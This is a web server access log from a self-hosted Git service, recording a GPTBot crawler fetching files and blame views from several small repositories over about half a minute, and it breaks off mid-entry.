"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" -[17/Feb/2026:13:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" -[17/Feb/2026:13:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66200] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66199] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11747] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11747] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" -[17/Feb/2026:13:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10895] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11867] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:13:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13327] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11519] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10494] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 12498] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" -[17/Feb/2026:13:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11597] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10429] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 12527] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" -[17/Feb/2026:13:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71998] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71999] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" -[17/Feb/2026:13:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" -[17/Feb/2026:13:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11538] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" -[17/Feb/2026:13:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11033] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" -[17/Feb/2026:13:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11647] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:13:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:13:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 20271] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" -[17/Feb/2026:13:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13589] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" -[17/Feb/2026:13:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16635] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" -[17/Feb/2026:13:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13367] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" -[17/Feb/2026:13:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15304] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" -[17/Feb/2026:13:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10107] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" -[17/Feb/2026:13:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" -[17/Feb/2026:13:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11549] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11542] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11542] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11535] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15542] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9959] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] 